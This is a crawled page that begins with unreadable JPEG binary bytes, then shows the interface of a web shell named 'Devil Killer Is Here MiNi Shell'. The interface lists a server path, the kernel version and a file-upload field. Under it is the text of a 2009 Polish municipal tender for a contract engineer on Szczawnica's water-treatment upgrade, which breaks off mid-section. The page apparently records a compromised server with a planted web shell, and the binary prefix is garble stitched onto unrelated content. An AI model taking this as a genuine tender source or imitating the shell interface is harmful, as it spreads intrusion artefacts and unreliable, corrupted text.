JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090216/29498-N-2009.html

<p class="kh_header"><b>Szczawnica: Pełnienie obowiązków inżyniera odpowiedzialnego za całościowe zarządzanie kontraktem realizowanym w ramach projektu polegającego na: Rozbudowie i modernizacji ujęć i stacji uzdatniania wody dla miasta Szczawnica z elementami ochrony środowiska</b><br>
<b>Numer ogłoszenia: 29498 - 2009; data zamieszczenia: 16.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Szczawnica , ul. Szalaya 103, 34-460 Szczawnica, woj. małopolskie, tel. 018 2622203, 2622530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczawnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inżyniera odpowiedzialnego za całościowe zarządzanie kontraktem realizowanym w ramach projektu polegającego na: Rozbudowie i modernizacji ujęć i stacji uzdatniania wody dla miasta Szczawnica z elementami ochrony środowiska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowe obowiązki inżyniera wynikające z realizacji obowiązku prowadzenia nadzoru inwestorskiego nad robotami i występowania w roli Inżyniera zgodnie z FIDIC:
1.sprawdzenie w terminach zapewniających przestrzeganie Umów na Roboty: posiadania oraz poprawności formalnej, merytorycznej i zgodności z Umowami na Roboty wymaganych w tych Umowach na Roboty ubezpieczeń robót i sprzętu oraz ubezpieczenia od odpowiedzialności cywilnej i ubezpieczenia od wypadków i pisemne natychmiastowe powiadomienie Zamawiającego o wynikach sprawdzenia wraz z sformułowaniem zaleceń naprawczych w przypadku opinii negatywnej o przedłożonym ubezpieczeniu
2.sprawdzanie aktualności i wystarczalności wszelkich ubezpieczeń i pisemne powiadomienie Zamawiającego o wynikach sprawdzenia wraz z sformułowaniem zaleceń naprawczych - jeśli to konieczne. Monitorowanie ubezpieczeń przedkładanych przez Wykonawcę Robót, kontrola terminowego opłacania składek ubezpieczeniowych w ramach polis przedłożonych przez Wykonawcę Robót. Wyniki tych czynności muszą być podane w odpowiednich Raportach miesięcznych,
3.natychmiastowe przygotowanie dla Zamawiającego pisemnej opinii (w aspekcie formalnym i merytorycznym ) i wszelkich niezbędnych dokumentów stanowiących podstawę roszczenia do Wykonawcy robót jeśli uchybił warunkom przewidzianym ubezpieczeniem i w polisach
4.sprawdzanie czy ubezpieczenia i gwarancje są poprawne i przedłożone przez Wykonawców robót zgodnie z warunkami Umów na Roboty. Wyniki tych czynności muszą być podane w odpowiednich Raportach miesięcznych
5.sprawdzenie: poprawności formalnej i merytorycznej i zgodności z IDW oraz Umową na Roboty wniesionego lub przedłożonego przez Wykonawcę robót zabezpieczenia należytego wykonania umowy w rozumieniu art. 147 Prawa Zamówień Publicznych (Dz. U. z 2007r. Nr 223 poz. 1655 z późniejszymi zmianami) i natychmiastowe pisemne powiadomienie Zamawiającego o wynikach sprawdzenia wraz z sformułowaniem zaleceń w przypadku opinii negatywnej o wniesionym lub przedłożonym zabezpieczeniu (w tym i dokumencie zabezpieczenia) 
6.egzekwowanie od Wykonawcy robót, w przypadku zmiany terminu wykonania przedmiotu Umowy na Roboty i wygaśnięcia ważności zabezpieczenia,  przedłożenia nowego dokumentu zabezpieczenia w terminie 7 dni od zajścia wyżej powołanych okoliczności
7.sprawdzenie wytyczenia robót przez Wykonawcę robót
8.przygotowanie dla Zamawiającego w terminie ustalonym przez Zamawiającego pisemnej opinii (w aspekcie formalnym i merytorycznym ) i wszelkich niezbędnych dokumentów stanowiących podstawę roszczenia do Wykonawcy robót z zabezpieczenia należytego wykonania Umowy na roboty jeśli zajdzie taka okoliczność. W przypadku niewłaściwego wywiązywania się Wykonawcy Robót z Umowy na roboty Inżynier będzie wspierał Zamawiającego w dochodzeniu i egzekwowaniu od Wykonawcy robót należnego odszkodowania i kary umownej za nienależyte i nieterminowe wykonanie Umowy na roboty, jak to regulują warunki Kontraktu na roboty,
9.Przygotowanie na polecenie Zamawiającego pisemnej opinii na temat możliwości zwolnienia zabezpieczenia należytego wykonania Umowy na roboty w  ciągu 7 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym terminie jaki poda Zamawiający 
10.przechowywanie otrzymanej od Zamawiającego kopii Kontraktu na roboty (Inżynier otrzyma kopię najszybciej jak to możliwe po podpisaniu Umowy na roboty. Inżynier otrzyma także najszybciej jak to będzie możliwe od Zamawiającego kopię każdej Zmiany do Umowy na roboty). Przechowywanie wszelkich zapisów dotyczących realizacji Umowy na roboty w szczególności jako materiału dowodowego w przypadku powstania sporów, roszczeń Wykonawcy robót, katastrof, wypadków i innych okoliczności. Uczestnictwo w przekazaniu Wykonawcy robót wszystkich niezbędnych dokumentów wraz z kontrola ich kompletności.
Zmiana do Umowy na roboty  - oznacza dokument tak zatytułowany, wprowadzający do postanowień Umowy na roboty zmiany uzgodnione i podpisane pomiędzy Stronami zgodnie z Prawem obowiązującym w Rzeczpospolitej Polskiej, w szczególności z przepisami ustawy Prawo zamówień publicznych oraz ustawy Kodeks Cywilny.
Zmiana wchodzi w życie wyłącznie po podpisaniu przez Zamawiającego i Wykonawcę Robót. 
11.Inżynier będzie zobowiązany posiadać i przechowywać wszelkie dokumenty sporządzone przez Wykonawcę (w szczególności: rysunki dokumentacji wykonawczej, specyfikacje, obliczenia, rysunki dokumentacji powykonawczej, instrukcje) 
12.Inżynier będzie w toku realizacji robót opiniował, rekomendował, dokonywał weryfikacji i analizy rysunków, dokumentacji projektowej, dokumentacji wykonawczej i innych dokumentów wykonawczych, specyfikacji, obliczeń, instrukcji sporządzanych przez Wykonawcę robót z komentarzami dla Zamawiającego (w tym jeśli chodzi o zgodność / lub niezgodność z Umową na roboty). Inżynier sporządzi pisemne opinie i  wskaże  konieczne korekty tych dokumentów( jeśli to konieczne)  w  ciągu 7 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym terminie ustalonym przez Zamawiającego.
Jeśli Inżynier wyda pozytywną opinię będzie zobowiązany następnie  natychmiast zatwierdzić wymienione dokumenty z punktu widzenia: wymagań Zamawiającego zawartych w Umowie na roboty, poprawności technicznej i formalnej.
Inżynier zobowiązany jest do zalecania wszelkich zmian w specyfikacjach, dokumentacji projektowej, które są według niego konieczne dla realizacji robót  tym samym zatwierdzając je. Inżynier będzie zobowiązany posiadać i przechowywać te dokumenty.
13.Inżynier będzie zobowiązany do dostarczenia Wykonawcy robót niezbędnych dokumentów (w szczególności: rysunków, specyfikacji, obliczeń, instrukcji) w czasie umożliwiającym Wykonawcy wykonanie robót bez opóźnień, w sytuacji, w której Wykonawca powiadomił o konieczności posiadania tych dokumentów
14.Inżynier będzie prowadził i przechowywał wszelką korespondencję
15.Inżynier będzie akceptował Harmonogram realizacji Umowy na roboty i Plan Płatności w porozumieniu i z akceptacją Zamawiającego w ciągu 10 dni od ich przedłożenia Inżynierowi przez Wykonawcę robót. 
16.Inżynier powiadomi pisemnie Zamawiającego, natychmiast po powstaniu, o każdym opóźnieniu robót i planowanych płatności, wskaże przyczyny oraz metody naprawcze. Inżynier  natychmiast w formie pisemnego raportu powiadomi Zamawiającego o wszelkich wykrytych lub podejrzewanych nieprawidłowościach na budowie 
17.Inżynier będzie na bieżąco sprawdzał uprawnienia i aktualność dokumentów (przynależność do izby, ubezpieczenie) Kierownika Budowy i Kierowników Robót Wykonawcy Robót wskazanych w  Umowie na roboty . Informację o wynikach sprawdzenia zawrze w aktualnym Raporcie miesięcznym i Przejściowym
18.Inżynier sporządzi dla Zamawiającego pisemną opinię (w ciągu 5 dni od złożonego wniosku  do Inżyniera) - w aspekcie  formalnym i merytorycznym - w sprawie zgody na dokonanie zmiany Kierownika Budowy i Kierowników Robót wskazanych w  ofercie Wykonawcy robót i Umowie na roboty jeśli z takim wnioskiem wystąpi Wykonawca robót, Zamawiający lub Inżynier
19.Inżynier zapewni, że Roboty wykonywane są przy zachowaniu należytego poziomu ochrony zdrowia i bezpieczeństwa,
20.Inżynier zapewni swój współudział w przekazaniu Terenu Budowy Wykonawcy robót
21.Inżynier przedłoży Zamawiającemu do akceptacji przyjęty przez Wykonawcę robót system kontroli wymagań wynikających ze Specyfikacji Technicznej Wykonania i Odbioru Robót w zakresie wymaganych prób i badań w zaakceptowanym laboratorium dla potwierdzenia osiągnięcia zakładanych parametrów przy odbiorach częściowych i końcowym w terminie wskazanym przez Zamawiającego.
22.Inżynier zorganizuje badania jakości w instytutach specjalistycznych jeśli będzie to konieczne - na koszt Zamawiającego; po uprzedniej zgodzie  Zamawiającego,
23.Inżynier będzie sprawował kontrolę sposobu  składowania i przechowywania materiałów 
24.Inżynier będzie zatwierdzał  materiały budowlane i instalacyjne oraz  urządzenia i dostawy przewidziane przez Wykonawcę robót do wbudowania, sprawdzał, autentyczność, kompletność, prawidłowość i formułował zalecenia dotyczące wszelkich certyfikatów,  atestów, dokumentów jakości, aprobat, deklaracji zgodności, gwarancji, praw własności itp., w celu nie dopuszczenia do wbudowania materiałów wadliwych lub nie dopuszczonych do stosowania
25.Inżynier będzie  sprawdzał jakość oraz zgodności materiałów budowlanych i instalacyjnych oraz  urządzeń i dostaw z Umową na roboty, organizował dodatkowe testy jakości na koszt Zamawiającego, za zgodą Zamawiającego jeśli to konieczne 
26.Inżynier dokona zatwierdzeń przedstawionych metod wykonywania robót budowlanych, włączając roboty tymczasowe zaproponowane przez Wykonawcę robót zgodnie z Umową na roboty 
27.Inżynier jest zobowiązany do wydawania Wykonawcy robót; Kierownikowi Budowy lub Kierownikowi Robót poleceń, potwierdzonych wpisem w Dzienniku Budowy, dotyczących w szczególności: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
28.Inżynier jest zobowiązany żądać od Wykonawcy robót; Kierownika Budowy lub Kierownika Robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub Pozwoleniem na budowę
29.Inżynier dokona odbioru robót zanikających i ulegających zakryciu
30.Inżynier pisemnie  zaopiniuje zasadności przedłużenia Czasu na ukończenie robót wraz z analizą skutków finansowych i formalnych  dla Umowy na roboty na żądanie Zamawiającego i w określonym przez Zamawiającego terminie. 
Inżynier wyrazi zgodę na przedłużenie Czasu na ukończenie, po uzyskaniu pisemnej zgody od Zamawiającego .
Inżynier wyda polecenie Wykonawcy robót w zakresie zawieszenia całości lub części prac w przypadkach określonych Kontraktem na Roboty po uzyskaniu pisemnej zgody od Zamawiającego.
Inżynier udzieli zezwolenia Wykonawcy robót na wznowienie całości lub części prac w przypadkach przewidzianych w Kontrakcie na Roboty po uzyskaniu pisemnej zgody od Zamawiającego.
Inżynier na żądanie Zamawiającego i w określonym przez Zamawiającego terminie pisemnie  zaopiniuje zasadność zawieszenia i wznowienia robót wraz z analizą skutków finansowych i formalnych  dla Kontraktu na roboty Inżynier pisemnie zaopiniuje (w aspekcie  formalnym i merytorycznym)   przyczyny nie dotrzymania  Czasu na ukończenie z winy Wykonawcy robót stanowiące podstawę dla Zamawiającego o wystąpienie o odszkodowanie za zwłokę i do dochodzenia (na zasadach ogólnych Kodeksu Cywilnego) odszkodowania uzupełniającego przenoszącego wysokość kar umownych - do wysokości rzeczywiście poniesionej szkody. Opinia zostanie wykonana na żądanie Zamawiającego w ciągu 7 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym  określonym przez Zamawiającego terminie 
31.Inżynier sprawdzi wykonanie robót i powiadomi Wykonawcę robót o wykrytych wadach oraz określi zakres robót  niezbędnych do wykonania  celem usunięcia wad wraz z podaniem terminu ich wykonania a następnie dokona odebrania wykonanych robót usuwających wady, w ciągu 7 dni od usunięcia wad pisemnie poświadczy usunięcie wad przez Wykonawcę robót. Przygotuje od strony  formalnej - zgodnej z Prawem Zamówień Publicznych -, merytorycznej i finansowej  zlecenie (postępowanie ) ws. usunięcia wad innemu wykonawcy w przypadku jeśli Wykonawca  robót nie usunie wad  w ciągu 7 dni od wydania pisemnego polecenia przez Zamawiającego lub w  innym wyznaczonym przez Zamawiającego  terminie 
32.Inżynier przeprowadzi z Wykonawcą robót odbiory częściowe ( jeśli są przewidziane)  i końcowy robót, wystawi Świadectwa Przejęcia, sprawdzi pod względem jakości,  kompletności, prawidłowości dokumenty wymagane do odbioru  przedłożone przez Wykonawcę robót i przygotuje i przedłoży Zamawiającemu pozostałe niezbędne do odbioru dokumenty. Inżynier  wyegzekwuje od Wykonawcy robót wykonanie zaleceń poodbiorowych.
Rozpoczęcie czynności odbiorowych  wykonanych robót nastąpi w ciągu 21 dni od daty zgłoszenia gotowości do odbioru  przez Wykonawcę robót. Inżynier w imieniu Zamawiającego zawiadomi wszystkich uczestników odbioru (w tym: Wykonawcę robót, Zamawiającego Beneficjanta Końcowego)  o wyznaczonym terminie rozpoczęcia czynności odbioru co najmniej 7 dni przed jego rozpoczęciem. Czynności odbiorowe zostaną zakończone w terminie 21 dni liczą od dnia rozpoczęcia.  
33.Inżynier przygotuje i przedłoży Świadectwa Przejęcia w uzgodnieniu z Zamawiającym i w terminach wynikających z Kontraktu na roboty po otrzymaniu wniosku Wykonawcy robót.
34.W Okresie zgłaszania wad  dla robót  Inżynier zapewni (że będą realizowane) i będzie wykonywał, postanowienia odpowiednich warunków  Umowy na  roboty stanowiących  dokument gwarancyjny  w rozumieniu art. 577 § 1) Kodeksu cywilnego; w tym przygotuje pod względem merytorycznym, formalnym i finansowym zlecenie (postępowanie w rozumieniu Prawa Zamówień Publicznych ) ws. usunięcia wad innemu wykonawcy w przypadku jeśli wykonawca robót  nie usunie wad  w wyznaczonym terminie. Inżynier wyegzekwuje od Wykonawcy  robót wykonanie wszelkich postanowień gwarancyjnych.  
35.Inżynier będzie dokonywał oceny i weryfikacji propozycji robót dodatkowych przedstawionych przez Wykonawcę i Zamawiającego w zakresie finansowym,  rzeczowym i formalnym czyli - zgodnym z Prawem Zamówień Publicznych. Rozpoczęcie procedury związanej z wykonaniem robót dodatkowych może nastąpić tylko i wyłącznie po uprzednim wyrażeniu zgody przez Zamawiającego. Inżynier przygotuje i przedłoży Zamawiającemu w ciągu 5 dni od powstania konieczności robot dodatkowych przedstawionych w pisemnym wniosku Wykonawcy, Zamawiającego lub własnym lub w innym  określonym przez Zamawiającego terminie :
- Protokół konieczności zawierający uzasadnienie dla wykonania robót dodatkowych  
-Protokół z negocjacji zawierający uzgodnione z  Wykonawcą robót ceny lub stawki dla robót dodatkowych  w oparciu o zapisy Umowy na roboty.
Ostatecznie wszystkie protokoły podlegają zaakceptowaniu przez Zamawiającego, tylko pod tym warunkiem mogą stanowić podstawę do wystawienia Przejściowego Świadectwa Płatności.
Do obowiązków Inżyniera należy opiniowanie i rekomendowanie każdej propozycji  Zmiany do Umowy na roboty pod względem finansowym, formalnym i rzeczowym - zgodnym z Prawem Zamówień Publicznych z podaniem skutków zmian (koszt i czas) oraz zarządzania zmianami Kontraktu na roboty we wszelkich aspektach (finansowym, rzeczowym, formalnym), a także przygotowania odpowiednich dokumentów dotyczących Zmiany wynikających w szczególności  z wymogów Umowy na roboty, Prawa Zamówień Publicznych - w terminach ustalonych przez Zamawiającego. 
36.Inżynier zapewni swój współudział w przygotowaniu przez Wykonawcę robót dokumentu Zmiany do Umowy na  roboty 
37.Inżynier przygotuje i przedłoży Zamawiającemu pełną i wyczerpującą  propozycję Zmiany  do Kontraktu na  roboty lub nowego zamówienia wraz opinią (w aspekcie finansowym, formalnym i rzeczowym - zgodnym z Prawem Zamówień Publicznych) w terminach umożliwiających  prawidłowe zawarcie Zmiany lub udzielenie nowego zamówienia. 
38.Inżynier zapewni zapobieganie roszczeniom Wykonawcy robót
39.Inżynier  poinformuje (z odpowiednim wyprzedzeniem) Zamawiającego o możliwości powstania roszczenia w sposób, który umożliwia unikniecie roszczenia 
40.Inżynier powiadomi natychmiast Zamawiającego o powstałych roszczeniach (przyczyny), przedłoży Zamawiającemu wszelkie dokumenty związane z roszczeniem wraz z analizą i opinią pisemną o sposobie rozwiązania i skutkach (w tym: koszt, czas) w  ciągu 5 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym terminie ustalonym przez Zamawiającego.
41.Inżynier dokona obmiarów wykonanych robót.
Księga Obmiarów przygotowana przez Wykonawcę robót, musi być przejrzana i podpisana przez Inżyniera w ciągu 14 dni od momentu jej otrzymania.
42.Na polecenie Zamawiającego i w ustalonych przez Zamawiającego terminach Inżynier sporządzi pisemną opinię umowy z podwykonawcami przedłożoną zgodnie z Umową na Roboty i tym samym  wyrazi zgodę na wykonanie robot przez podwykonawcę, zgodnie z zasadami podanymi w Umowie na Roboty
43.Inżynier będzie akceptował oświadczenia miesięczne Wykonawcy w ciągu 7 dni od ich otrzymania i sporządzał Przejściowe Świadectwa Płatności w ciągu 14 dni od otrzymania kompletu dokumentów rozliczeniowych. 
Inżynier  będzie sprawdzał poprawność faktur Wykonawcy robót pod względem merytorycznym, rachunkowym, formalnym i będzie je rekomendował w formie pisemnej do zapłaty
Cała korespondencja pomiędzy Wykonawcą robót i Inżynierem dotycząca wszystkich płatności musi być wysyłana w formie kopii do Zamawiającego.
Inżynier zobowiązuje się do przekazywania jednocześnie prawidłowych PŚP i faktur Zamawiającemu nie później niż 28 dni przed terminem płatności wynikającym z Kontraktu na roboty
44.Inżynier dokona przeglądu, zaopiniuje i oceni  pisemnie   dokumentację powykonawczą (jej kompletność, zgodność ze stanem faktycznym, poprawność formalną) a następnie dostarczy ją do Zamawiającego w   3-ch egzemplarzach w  ciągu 7 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym  terminie ustalonym przez Zamawiającego. Inżynier  przedłoży także kompletną dokumentację związaną z nadzorowaną Umową na roboty (łącznie z pomiarami geodezyjnymi /powykonawcza inwentaryzacja geodezyjna/ naniesionymi na plany sytuacyjne) w formie ustalonej przez Zamawiającego , w  ciągu 7 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym terminie ustalonym przez Zamawiającego.
45.Inżynier skompletuje, oceni  i pisemnie zaopiniuje, a następnie  przedłoży  Zamawiającemu,  prawidłową dokumentację i oświadczenia Wykonawcy robót wymagane odpowiednimi przepisami celem zawiadomienia właściwego organu nadzoru budowlanego o zamiarze przystąpienia do użytkowania - zakończenia budowy, w ciągu 14 dni od otrzymania pisemnego polecenia od Zamawiającego lub w innym  ustalonym przez  Zamawiającego terminie,
46.Inżynier  przygotuje  dla  Umowy na roboty  wszelkie dokumenty niezbędne do wystawienia Świadectwa Wykonania i Końcowego Świadectwa Płatności oraz wystawi je oraz przedstawi pisemne sprawozdanie o stanie zrealizowanych czynności wynikających z wymogów Okresu zgłaszania wad dla Umowy na roboty i zawrze w sprawozdaniu spis  wykonanych  czynności a także  spis koniecznych do sporządzenia dokumentów  dla prawidłowego zakończenia kontraktu i zwolnienia Zabezpieczenia należytego wykonania umowy w terminie podanym przez Zamawiającego
47.Inżynier dokona rozliczenia Umowy na roboty w przypadku jego  przerwania z jakiejkolwiek przyczyny w terminie ustalonym z Zamawiającym. Inżynier przygotuje także inwentaryzacje wykonanych robót i wystawi Świadectwo Płatności po ostatecznym rozliczeniu oraz wykona czynności jak wskazano w pkt 9.
48.Inżynier ma obowiązek organizowania z udziałem Wykonawcy robót, Zamawiającego okresowych narad na Terenie   Budowy (przynajmniej 1 raz w miesiącu, a w okresie nasilenia prac z częstotliwością uzgodnioną z Zamawiającym) oraz sporządzanie notatki z przebiegu spotkania. Na spotkaniach należy  dążyć do podejmowania bieżących decyzji dotyczących wszystkich zagadnień mających wpływ na postęp robót.
49.Inżynier jest zobowiązany do ścisłej  współpracy z nadzorem autorskim. 
50.Inżynier będzie dążył do polubownych  rozwiązań sporów, oceniał i rozstrzygał roszczenia i problemy , zapobiegał sporom i opóźnieniom. Inżynier będzie brał udział w pracach Komisji rozjemczej lub procedurze arbitrażowej.
51.Inżynier będzie wykonywał wszystkie inne czynności nie wymienione w Umowie ani w Umowie na  roboty, które będą  konieczne do prawidłowej realizacji Umowy na roboty i oraz do zabezpieczenia interesów Zamawiającego.
52.Inżynier będzie wykonywał niezbędne czynności w Okresie zgłaszania wad dla  Kontraktu na roboty. Czynności te dotyczą  w szczególności: przeglądu wykonanych robót, egzekwowania usunięcia wad przez Wykonawcę robót oraz przygotowania w formie pisemnego sprawozdania  dotyczącego wystawienia Świadectwa Wykonania i Końcowego Świadectwa Płatności i zwolnienia Zabezpieczenia należytego wykonania Umowy na roboty w terminach wynikających z Umowy na roboty.
53.Inżynier będzie przygotowywał i przedkładał Zamawiającemu Raporty zgodnie z zapisami  niniejszego Opisu Przedmiotu Zamówienia (ściśle w terminach) w:
 a) postępu prac w Kontrakcie na Roboty
 b) wykonania Umowy.
54.Inżynier będzie wykonywał wszystkie inne czynności nie wymienione w Umowie na roboty, które będą konieczne do prawidłowej realizacji Umowy na roboty i do spełnienia wymagań Europejskiego Funduszu Rozwoju Regionalnego  oraz zabezpieczenia interesów Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.24.70.00-1, 71.24.80.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.31.00.00-4, 71.31.54.00-3, 71.35.61.00-9, 71.50.00.00-3, 71.52.00.00-9, 71.52.10.00-6, 71.54.00.00-5, 71.63.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 
10 000 PLN

2. Forma wadium:

1) Wadium może być wniesione w następujących formach: 
a) pieniądzu; 
b) poręczeniach bankowych; 
c) gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych; 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
2) W przypadku składania przez Wykonawcę wadium w formie gwarancjiporęczenia, gwarancjaporęczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancjiporęczenia (Zamawiającego), gwarantaporęczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, 
b) określenie wierzytelności, która ma być zabezpieczona gwarancjąporęczeniem, 
c) kwotę gwarancjiporęczenia, 
d) termin ważności gwarancjiporęczenia 
